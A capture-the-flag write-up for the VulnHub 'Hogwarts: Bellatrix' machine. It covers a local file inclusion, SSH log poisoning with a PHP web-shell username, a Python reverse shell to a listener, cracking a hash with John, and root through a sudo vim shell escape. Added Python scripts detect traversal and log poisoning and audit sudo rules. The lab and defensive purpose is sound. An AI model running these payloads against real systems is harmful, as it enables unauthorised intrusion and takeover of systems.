VulnHub: Hogwarts: Bellatrix

Today we will take a look at VulnHub: Hogwarts: Bellatrix. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open --open 192.168.0.105

Nmap scan report for 192.168.0.113
Host is up (0.032s latency).
Not shown: 61087 closed tcp ports (reset), 4446 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4b:ce:c7:5a:9c:1f:8b:cd:47:03:08:69:85:c2:91:49 (RSA)
| 256 a1:2a:a8:15:99:04:cc:2a:1e:e3:50:00:f3:55:c2:cc (ECDSA)
|_ 256 2c:d3:ec:6f:4f:5b:4a:e0:ea:0a:c3:0d:2f:cb:78:17 (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: AvadaKedavra
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 3C:A0:67:C5:35:33 (Liteon Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Web

Having spotted a reference to a .php page, we open it.

http://192.168.0.113/ikilledsiriusblack.php

There is a hint in the page source.

Yes, that’s what you think: a local file inclusion. Let’s check. ;)

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../../etc/passwd

From here we need a reverse shell. Investigating further, we find that the same parameter can read the SSH authentication log:

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../../var/log/auth.log

Command: ssh '<?php system($_GET["cmd"]); ?>'@192.168.0.113

sshd writes the rejected username verbatim into /var/log/auth.log, so when the vulnerable script includes that log the PHP tag is executed and the cmd parameter becomes a command to run.

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../..//var/log/auth.log&cmd=ls%20-la

Yes, it works.
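Two things a defender can look for in the logs of a box like this, as an added example (not part of the original writeup): the `file` parameter carrying a traversal sequence in the Apache access log, and a PHP open tag sitting in an sshd "Invalid user" line in auth.log, which is the trace the poisoning step above leaves behind before the log is ever included. All log lines, hosts, IPs and timestamps below are constructed, and the allow-list of accepted parameters for the endpoint is an assumption for this example.

```python
"""Added detection example (constructed sample logs, not from the VM): flag
path-traversal values in the query of the vulnerable endpoint in an Apache
access log, and PHP tags that a log-poisoning attempt leaves in sshd entries
in auth.log. Host names, IPs and timestamps are made up."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines: one benign request, two traversal
# requests mirroring the writeup (one of them URL-encoded), one benign include.
ACCESS_LOG = """\
192.168.0.107 - - [22/May/2022:20:40:01 +0000] "GET /index.php HTTP/1.1" 200 512
192.168.0.107 - - [22/May/2022:20:41:12 +0000] "GET /ikilledsiriusblack.php?file=../../../../../../etc/passwd HTTP/1.1" 200 2048
192.168.0.107 - - [22/May/2022:20:43:55 +0000] "GET /ikilledsiriusblack.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fvar/log/auth.log&cmd=ls%20-la HTTP/1.1" 200 9876
192.168.0.107 - - [22/May/2022:20:44:10 +0000] "GET /ikilledsiriusblack.php?file=about.txt HTTP/1.1" 200 300
"""

# Constructed auth.log lines: a normal login, a poisoned "Invalid user" entry
# (sshd logs the attempted username verbatim), and an ordinary failure.
AUTH_LOG = """\
May 22 20:42:30 bellatrix sshd[1240]: Accepted publickey for lestrange from 192.168.0.50 port 50022 ssh2
May 22 20:42:51 bellatrix sshd[1251]: Invalid user <?php system($_GET["cmd"]); ?> from 192.168.0.107 port 51234
May 22 20:42:53 bellatrix sshd[1251]: Failed password for invalid user guest from 192.168.0.107 port 51235 ssh2
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Parameters the endpoint legitimately accepts (assumption for this example).
ALLOWED_PARAMS = {"/ikilledsiriusblack.php": {"file"}}


def suspicious_params(target):
    """Return (name, decoded value, reason) for every query parameter that
    walks up the directory tree, names an absolute path, or is not expected
    on this endpoint. Values are decoded a second time so double-encoded
    payloads such as %252e%252e%252f are caught as well."""
    url = urlsplit(target)
    allowed = ALLOWED_PARAMS.get(url.path)
    hits = []
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)  # parse_qs already decoded once
            if "../" in decoded or "..\\" in decoded:
                hits.append((name, decoded, "directory traversal"))
            elif decoded.startswith("/"):
                hits.append((name, decoded, "absolute path"))
            elif allowed is not None and name not in allowed:
                hits.append((name, decoded, "unexpected parameter"))
    return hits


def scan_access_log(text):
    """Return (client, target, hits) for each request with a suspicious parameter."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group("target"))
        if hits:
            findings.append((line.split()[0], match.group("target"), hits))
    return findings


def scan_auth_log(text):
    """Return auth.log lines containing a PHP open tag: no client-controlled
    field (username, client banner) should ever carry one."""
    return [line for line in text.splitlines() if PHP_TAG_RE.search(line)]


if __name__ == "__main__":
    for client, target, hits in scan_access_log(ACCESS_LOG):
        print(f"{client} {target}")
        for name, value, reason in hits:
            print(f"    {reason}: {name}={value!r}")
    for line in scan_auth_log(AUTH_LOG):
        print("poisoned log entry:", line)
```

The auth.log check fires at the moment of the SSH attempt, which is earlier than any web request that includes the log, so it is the higher-value alert of the two; the access-log check is what confirms the include itself and the extra `cmd` parameter that turns it into command execution.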

Through the same cmd parameter we launch a Python reverse shell that connects back to our listener on 192.168.0.107:1234:

Command: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.107",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After the shell connects, we upgrade it to a full TTY:

Command: script /dev/null -c bash

Command: export TERM=xterm

ctrl+z

Command: stty raw -echo ; fg

Command: reset

  • Lestrange

As we look around, we see a folder whose name is base64-encoded. It contains two files: a password list and a hash of the name and password.

Command: john hash --wordlist=pass.txt

Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateharrypotter (lestrange)
1g 0:00:00:00 DONE (2022-05-22 20:52) 2.380g/s 273.8p/s 273.8c/s 273.8C/s gryffondor
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Command: su lestrange

  • Root

Command: sudo -l

(ALL : ALL) NOPASSWD: /usr/bin/vim

Command: sudo /usr/bin/vim -c ':!/bin/sh'

And now we are root.
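The sudoers rule that ends this box is the kind of thing an administrator should catch in review. As an added example (not from the writeup), the script below parses `sudo -l` output and flags rules that are effectively a root shell: a command that offers a shell escape, or `ALL`, made worse by `NOPASSWD`. The sample output is constructed to contain the rule from this box plus one benign rule; the set of shell-escape binaries is a short illustrative list, not an exhaustive one.

```python
"""Added example (not from the writeup): parse `sudo -l` output and flag rules
that amount to an unrestricted root shell. The sample output is constructed."""
import os
import re

SUDO_L_OUTPUT = """\
Matching Defaults entries for lestrange on bellatrix:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User lestrange may run the following commands on bellatrix:
    (ALL : ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart apache2
"""

# One sudo rule line: "(runas) TAG: TAG: cmd1, cmd2 ..."
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Editors and pagers that can start a sub-shell from inside the program;
# granting them via sudo is the same as granting a root shell (illustrative list).
SHELL_ESCAPE_BINARIES = {"vim", "vi", "view", "vimdiff", "nano", "less", "more", "man"}


def parse_sudo_l(output):
    """Return one dict per rule line: runas spec, tag set, list of commands."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines and headers do not start with "("
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        commands = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({"runas": m.group("runas").strip(), "tags": tags, "commands": commands})
    return rules


def audit(rules):
    """Return findings for commands that give the caller a shell as the runas user."""
    findings = []
    for rule in rules:
        for command in rule["commands"]:
            binary = os.path.basename(command.split()[0])
            reasons = []
            if binary in SHELL_ESCAPE_BINARIES:
                reasons.append(f"{binary} offers a shell escape, so this rule is a root shell")
            if command == "ALL":
                reasons.append("any command is allowed")
            if reasons and "NOPASSWD" in rule["tags"]:
                reasons.append("no password is required, so any hijacked session gets root instantly")
            if reasons:
                findings.append({"runas": rule["runas"], "binary": binary,
                                 "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"({finding['runas']}) {finding['command']}")
        for reason in finding["reasons"]:
            print("   -", reason)
```

The fix on the box side is to drop the rule, or, if the user really needs to edit a privileged file, grant `sudoedit` on that one file (it copies the file to a temporary location and runs the editor as the caller, not as root) and keep the password requirement.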

“If you have any questions or comments, please do not hesitate to write. Have a good days”

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days
